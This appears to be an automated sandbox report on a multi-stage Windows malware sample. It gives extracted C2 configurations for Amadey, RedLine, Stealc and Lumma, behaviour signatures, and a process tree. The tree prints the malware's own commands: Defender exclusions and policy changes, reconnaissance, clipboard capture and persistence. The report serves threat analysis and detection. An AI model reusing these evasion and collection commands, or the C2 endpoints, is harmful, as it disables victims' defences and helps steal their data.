Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-05-2024 04:26

General

  • Target

    0e479ae504b40fe37994dd928b24cf35f1df6b468d213aa2d5cfe4eb46ecad7e.exe

  • Size

    1.8MB

  • MD5

    1c618def17ac162bb7689a71912f9872

  • SHA1

    8f895b5a9e817743a5575274e6cd7e63cf89e0df

  • SHA256

    0e479ae504b40fe37994dd928b24cf35f1df6b468d213aa2d5cfe4eb46ecad7e

  • SHA512

    330307d59d3d2cbe3d7b34af13719141368f917162fddca44723c60d77ce3b1bdb4df765813b2645a138abc929c60fb131613197ad363d3a63473fd5a09e5c66

  • SSDEEP

    49152:ckNLZx00gOIcNJLUPcuoFKuaFTq8ZBuYOfmTy5:ckNt8jPLiaF9NcmO

Malware Config

Extracted

Family

amadey

Version

4.21

Botnet

49e482

C2

http://147.45.47.70

Attributes
  • install_dir

    1b29d73536

  • install_file

    axplont.exe

  • strings_key

    4d31dd1a190d9879c21fac6d87dc0043

  • url_paths

    /tr8nomy/index.php

rc4.plain

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:40960

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

C2

185.172.128.33:8970

Extracted

Family

stealc

Botnet

zzvv

C2

http://23.88.106.134

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

lumma

C2

https://roomabolishsnifftwk.shop/api

https://museumtespaceorsp.shop/api

https://buttockdecarderwiso.shop/api

https://averageaattractiionsl.shop/api

https://femininiespywageg.shop/api

https://detailbaconroollyws.shop/api

https://employhabragaomlsp.shop/api

https://horsedwollfedrwos.shop/api

https://patternapplauderw.shop/api

https://stalfbaclcalorieeis.shop/api

https://understanndtytonyguw.shop/api

https://civilianurinedtsraov.shop/api

https://considerrycurrentyws.shop/api

https://messtimetabledkolvk.shop/api

https://deprivedrinkyfaiir.shop/api

https://relaxtionflouwerwi.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 3 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 13 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 26 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 34 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 4 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0e479ae504b40fe37994dd928b24cf35f1df6b468d213aa2d5cfe4eb46ecad7e.exe
    "C:\Users\Admin\AppData\Local\Temp\0e479ae504b40fe37994dd928b24cf35f1df6b468d213aa2d5cfe4eb46ecad7e.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1956
    • C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
      "C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:888
      • C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe
        "C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2692
        • C:\Users\Admin\AppData\Local\Temp\onefile_2692_133613440120363414\stub.exe
          "C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
          4⤵
          • Deletes itself
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:3376
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "ver"
            5⤵
              PID:2176
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4828
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic csproduct get uuid
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1700
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2012
              • C:\Windows\system32\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:1592
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:684
              • C:\Windows\system32\attrib.exe
                attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
                6⤵
                • Views/modifies file attributes
                PID:3932
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
              5⤵
                PID:1808
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2940
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM chrome.exe
                  6⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4240
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3896
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2788
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3688
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Get-Clipboard
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3636
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "chcp"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4552
                • C:\Windows\system32\chcp.com
                  chcp
                  6⤵
                    PID:3940
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "chcp"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5020
                  • C:\Windows\system32\chcp.com
                    chcp
                    6⤵
                      PID:3228
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3856
                    • C:\Windows\system32\systeminfo.exe
                      systeminfo
                      6⤵
                      • Gathers system information
                      PID:1168
                    • C:\Windows\system32\HOSTNAME.EXE
                      hostname
                      6⤵
                        PID:4652
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic logicaldisk get caption,description,providername
                        6⤵
                        • Collects information from the system
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2308
                      • C:\Windows\system32\net.exe
                        net user
                        6⤵
                          PID:1348
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 user
                            7⤵
                              PID:1956
                          • C:\Windows\system32\query.exe
                            query user
                            6⤵
                              PID:228
                              • C:\Windows\system32\quser.exe
                                "C:\Windows\system32\quser.exe"
                                7⤵
                                  PID:2232
                              • C:\Windows\system32\net.exe
                                net localgroup
                                6⤵
                                  PID:5000
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 localgroup
                                    7⤵
                                      PID:2592
                                  • C:\Windows\system32\net.exe
                                    net localgroup administrators
                                    6⤵
                                      PID:2024
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 localgroup administrators
                                        7⤵
                                          PID:3028
                                      • C:\Windows\system32\net.exe
                                        net user guest
                                        6⤵
                                          PID:4240
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 user guest
                                            7⤵
                                              PID:4988
                                          • C:\Windows\system32\net.exe
                                            net user administrator
                                            6⤵
                                              PID:4452
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 user administrator
                                                7⤵
                                                  PID:3608
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic startup get caption,command
                                                6⤵
                                                  PID:3636
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /svc
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:2232
                                                • C:\Windows\system32\ipconfig.exe
                                                  ipconfig /all
                                                  6⤵
                                                  • Gathers network information
                                                  PID:3632
                                                • C:\Windows\system32\ROUTE.EXE
                                                  route print
                                                  6⤵
                                                    PID:3432
                                                  • C:\Windows\system32\ARP.EXE
                                                    arp -a
                                                    6⤵
                                                      PID:4380
                                                    • C:\Windows\system32\NETSTAT.EXE
                                                      netstat -ano
                                                      6⤵
                                                      • Gathers network information
                                                      PID:1896
                                                    • C:\Windows\system32\sc.exe
                                                      sc query type= service state= all
                                                      6⤵
                                                      • Launches sc.exe
                                                      PID:2544
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh firewall show state
                                                      6⤵
                                                      • Modifies Windows Firewall
                                                      PID:2608
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh firewall show config
                                                      6⤵
                                                      • Modifies Windows Firewall
                                                      PID:1952
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                    5⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3952
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh wlan show profiles
                                                      6⤵
                                                        PID:4092
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                      5⤵
                                                        PID:1700
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          6⤵
                                                            PID:4988
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic csproduct get uuid
                                                            6⤵
                                                              PID:544
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                            5⤵
                                                              PID:3952
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic csproduct get uuid
                                                                6⤵
                                                                  PID:4124
                                                          • C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:3080
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                              4⤵
                                                              • Checks computer location settings
                                                              PID:1220
                                                              • C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
                                                                "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2124
                                                              • C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
                                                                "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3052
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                                                                5⤵
                                                                  PID:3940
                                                                  • C:\Windows\SysWOW64\choice.exe
                                                                    choice /C Y /N /D Y /T 3
                                                                    6⤵
                                                                      PID:2432
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3080 -s 284
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:4252
                                                              • C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Modifies system certificate store
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:4376
                                                              • C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:2712
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                  4⤵
                                                                    PID:4824
                                                                • C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe"
                                                                  3⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  PID:2220
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe" /F
                                                                    4⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:1992
                                                                    • C:\Windows\System32\Conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      5⤵
                                                                        PID:4552
                                                                  • C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:452
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                      4⤵
                                                                        PID:2964
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 452 -s 260
                                                                        4⤵
                                                                        • Program crash
                                                                        PID:2952
                                                                    • C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:4560
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                        4⤵
                                                                          PID:3452
                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          4⤵
                                                                          • Checks computer location settings
                                                                          • Checks processor information in registry
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:3624
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit
                                                                            5⤵
                                                                              PID:4720
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout /t 5
                                                                                6⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:4368
                                                                        • C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"
                                                                          3⤵
                                                                          • UAC bypass
                                                                          • Windows security bypass
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
                                                                          • Windows security modification
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of SetThreadContext
                                                                          • System policy modification
                                                                          PID:3940
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force
                                                                            4⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:2232
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                            4⤵
                                                                              PID:1168
                                                                              • C:\Users\Admin\Pictures\51WCPKxUlYrYPlEND9eBvz69.exe
                                                                                "C:\Users\Admin\Pictures\51WCPKxUlYrYPlEND9eBvz69.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Checks SCSI registry key(s)
                                                                                PID:4496
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 352
                                                                                  6⤵
                                                                                  • Program crash
                                                                                  PID:1892
                                                                              • C:\Users\Admin\Pictures\KVxqI2EJooYotNPULtlVDJat.exe
                                                                                "C:\Users\Admin\Pictures\KVxqI2EJooYotNPULtlVDJat.exe" /s
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Writes to the Master Boot Record (MBR)
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:1632
                                                                              • C:\Users\Admin\Pictures\uiELIWowKd22n9ZhzDBhiZV9.exe
                                                                                "C:\Users\Admin\Pictures\uiELIWowKd22n9ZhzDBhiZV9.exe"
                                                                                5⤵
                                                                                • Modifies firewall policy service
                                                                                • Windows security bypass
                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                • Checks BIOS information in registry
                                                                                • Executes dropped EXE
                                                                                • Windows security modification
                                                                                • Checks whether UAC is enabled
                                                                                • Drops file in System32 directory
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                PID:1568
                                                                              • C:\Users\Admin\Pictures\KcIPAGj0rxbcPfTZC5KBdSny.exe
                                                                                "C:\Users\Admin\Pictures\KcIPAGj0rxbcPfTZC5KBdSny.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:2868
                                                                              • C:\Users\Admin\Pictures\kDgDYfp6I6H4oJticA9t38UB.exe
                                                                                "C:\Users\Admin\Pictures\kDgDYfp6I6H4oJticA9t38UB.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:2112
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS5606.tmp\Install.exe
                                                                                  .\Install.exe
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4564
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS5809.tmp\Install.exe
                                                                                    .\Install.exe /NQHxdidUQs "385118" /S
                                                                                    7⤵
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Enumerates system info in registry
                                                                                    PID:4916
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                      8⤵
                                                                                        PID:4536
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                          9⤵
                                                                                            PID:4980
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                              10⤵
                                                                                                PID:2592
                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                  11⤵
                                                                                                    PID:2296
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                9⤵
                                                                                                  PID:4596
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                    10⤵
                                                                                                      PID:2836
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                        11⤵
                                                                                                          PID:3448
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                      9⤵
                                                                                                        PID:3408
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                          10⤵
                                                                                                            PID:4896
                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                              11⤵
                                                                                                                PID:4192
                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                            9⤵
                                                                                                              PID:5004
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                10⤵
                                                                                                                  PID:3420
                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                    11⤵
                                                                                                                      PID:1520
                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                  forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                  9⤵
                                                                                                                    PID:540
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                      10⤵
                                                                                                                        PID:3452
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                          11⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:2324
                                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                            12⤵
                                                                                                                              PID:4888
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
